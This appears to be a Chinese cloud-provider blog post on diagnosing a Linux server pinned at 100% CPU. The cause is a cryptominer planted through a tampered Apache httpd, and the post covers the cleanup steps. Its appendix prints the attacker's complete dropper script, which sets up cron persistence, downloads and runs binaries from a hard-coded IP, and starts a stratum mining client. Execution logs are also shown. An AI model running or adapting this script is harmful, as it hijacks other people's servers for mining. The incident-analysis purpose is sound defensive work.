溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Linux系統(tǒng)cpu的100%修復(fù)方法是什么

發(fā)布時間:2022-01-07 15:19:19 來源:億速云 閱讀:108 作者:iii 欄目:云計算

這篇“Linux系統(tǒng)cpu的100%修復(fù)方法是什么”文章的知識點大部分人都不太理解,所以小編給大家總結(jié)了以下內(nèi)容,內(nèi)容詳細,步驟清晰,具有一定的借鑒價值,希望大家閱讀完這篇文章能有所收獲,下面我們一起來看看這篇“Linux系統(tǒng)cpu的100%修復(fù)方法是什么”文章吧。

案例背景:

Linux主機連續(xù)三天CPU%

處理思路:

1、  登錄服務(wù)器查看/var/log/messages+/var/log/messages.1+/var/log/messages.3里恰好沒那三天的日志

2、  dmesg里也無有用的信息

3、  至此懷疑是被攻擊了,自然而然的去看對應(yīng)時間點的帶寬占用情況,查看之后發(fā)現(xiàn)帶寬一切正常,繼續(xù)排查

4、  懷疑是某個程序的異常,首先的從web進程開始查,通過httpd的erorr_log發(fā)現(xiàn)了異常的現(xiàn)象,httpd程序被修改過,執(zhí)行的腳本就是附錄的shell腳本

2014-09-0319:19:50 (124 KB/s) - “plm” saved [26587/26587]

FINISHED--2014-09-03 19:19:50--

Downloaded:1 files, 26K in 0.2s (124 KB/s)

+ perlplm

+ rm -rfplm

+ chmod+x apache

+ chmod+x apache-ssl

++ ps x

++ grep-v grep

++ awk'{print $1}'

++ grep stratum

+ kill -9

kill:usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l[sigspec]

+ killall-9 kav m32 m64 apache apache-ssl

kav: noprocess killed

m32: noprocess killed

m64: noprocess killed

apache:no process killed

apache-ssl:no process killed

+ PATH=.

+ apache-c httpd.conf

a.sh:./apache: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory

[root@iZ23vqwi2k5Z~]# + PATH=.

+apache-ssl -c httpd.conf

[2014-09-0319:19:50] Starting Stratum on stratum+tcp://80.240.137.183:3333/

[2014-09-0319:19:50] 2 miner threads started, using 'scrypt' algorithm.

[2014-09-0319:19:50] Binding thread 0 to cpu 0

[2014-09-0319:19:50] Binding thread 1 to cpu 1

[2014-09-0319:19:51] Stratum detected new block

[2014-09-0319:20:02] Stratum detected new block

[2014-09-03 19:22:53] Stratum detected new block

5、  在阿里云的測試機器上,通過運行這個腳本,測試運行的過程中cpu持續(xù)100%,httpd的error_log的內(nèi)容和客戶機器上的基本一致,(看來是基本功沒做好的黑客,屁股沒擦干凈)至此已經(jīng)完全定位問題,懷疑是服務(wù)器web程序被修改拿來干壞事(懷疑挖礦)

6、  清除異常進程的的思路,按照腳本內(nèi)容做大致的推測

(1)、首先想到的是刪除異常目錄文件

# rm -rf /dev/shm/*(刪除)

(2)、ps到具體的進程kill掉

#Ps aux|grep apche

#root      1615  199 0.1 314992  4200 pts/0    Sl  19:19  37:38 apache-ssl -chttpd.conf

#pkill -9 apache

#ps aux|grep apache|awk '{print $2}'|xargs kill -9(刪除惡意進程)

(3)、以上操作執(zhí)行之后發(fā)現(xiàn)異常目錄文件再次生成,apache-ssl進程再次啟動,查看腳本里有對cron的操作,把cron清空,再次執(zhí)行之上的動作就可以了

# crontab –l 

* * * * * /dev/shm/update >/dev/null 2>&1

(4)、試著重新啟動httpd進程,發(fā)現(xiàn)失敗,查看日志是配置文件的異常,查看httpd.conf出現(xiàn)bak的備份文件,良心黑客啊,干壞事不忘記先給客戶備份文件。

# pwd

/alidata/server/httpd/conf

# cp httpd.conf.bak httpd.conf

# /etc/init.d/httpd start(此步驟httpd進程恢復(fù))

7、  附錄惡意用戶的shell內(nèi)容

#!/bin/sh

crontab-r

cd/dev/shm

rm -rf a*c* update*

pwd >mech.dir

dir=$(catmech.dir)

echo"* * * * * $dir/update >/dev/null 2>&1" > cron.d

crontabcron.d

crontab-l | grep update

wget 173.255.212.191/update>> /dev/null &&

curl -Ohttp://173.255.212.191/update >> /dev/null &&

chmod u+xupdate

#chattr-ia bash

#chattr-ia *

curl -Ohttp://173.255.212.191/apache

curl -Ohttp://173.255.212.191/apache-ssl

crul -Ohttp://173.255.212.191/httpd.conf

wget173.255.212.191/httpd.conf

wgethttp://173.255.212.191/apache

wgethttp://173.255.212.191/apache-ssl

wget wgethttp://173.255.212.191/plm

perl plm

rm -rfplm*

chmod +xapache

chmod +xapache-ssl

#kill -9`ps x|grep miner|grep -v grep|awk '{print $1}'`

kill -9`ps x|grep stratum|grep -v grep|awk '{print $1}'`

killall-9 kav m32 m64 apache apache-ssl

PATH="."apache -c httpd.conf &

PATH="."apache-ssl -c httpd.conf &

#chattr+ia bash

#chattr +ia sh

以上就是關(guān)于“Linux系統(tǒng)cpu的100%修復(fù)方法是什么”這篇文章的內(nèi)容,相信大家都有了一定的了解,希望小編分享的內(nèi)容對大家有幫助,若想了解更多相關(guān)的知識內(nèi)容,請關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI